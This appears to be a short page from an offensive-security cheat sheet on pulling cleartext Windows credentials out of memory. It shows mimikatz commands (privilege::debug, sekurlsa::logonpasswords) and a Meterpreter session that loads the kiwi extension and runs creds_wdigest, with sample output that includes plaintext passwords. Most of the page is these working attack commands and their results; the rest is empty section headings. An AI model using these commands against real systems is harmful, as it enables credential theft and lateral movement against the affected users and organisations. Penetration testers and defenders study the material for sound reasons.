Retrieve Windows passwords
This page deals with retrieving windows clear text credentials from memory and WDigest.
Introduction
Retrieve clear text passwords from memory
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
[...]
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
[...]meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.1.1 20170608 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' Ported to Metasploit by OJ Reeves `TheColonial` * * */
Success.
meterpreter > creds_wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
WIN01$ WORKGROUP (null)
localadmin WIN01 L0c4l4dm1nMinidump

WDigest
Lock, signout, and reboot from CMD
References
Last updated